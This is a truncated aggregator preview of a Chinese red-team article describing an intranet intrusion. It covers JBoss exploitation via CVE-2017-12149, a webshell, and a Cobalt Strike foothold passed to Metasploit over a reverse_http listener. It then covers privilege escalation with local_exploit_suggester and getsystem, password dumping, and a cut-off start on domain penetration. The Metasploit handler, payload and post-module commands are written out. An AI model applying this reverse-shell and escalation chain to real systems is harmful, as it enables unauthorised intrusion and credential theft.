今天看啥  ›  专栏  ›  红队攻防实验室

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

红队攻防实验室  · 公众号  ·  · 2022-05-04 10:50

文章预览

前言 首先是通过 CVE-2017-12149 拿到了一个口子: 但其实 Jboss 的这个路径可以查看到日志 http://redteam.red:9090/status 发现有日志,已经被上传了 webshell: 后来通过 Bypass 后使用 powershell 上线到 CobaltStrike: 利用 Metasploit 特权提权拿到 SYSTEM SHELL 上线之后通过信息搜集发现有几百个补丁,通过已知漏洞提权无果: 随后吧 CobaltStrike 的 Beacon 互传到了 Metasploit: CS: 创建监听器windows/foreign/reverse_http 执行监听器 spawn msf MSF: use exploit/multi/handler set payload windows/meterpreter/reverse_http 然后通过 Metasploit 的提权检测模块找到了几个提权 exp : run post/multi/recon/local_exploit_suggester 然后利用提权 exp : 发现用户没变,但是当前特权变多了: 然后直接 getsystem 提权到 SYSTEM: 最后利用 SYSYEM 身份的把 shell 传到 Cobaltstrike: 当前权限就可以抓到密码了: 内网渗透 虽 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览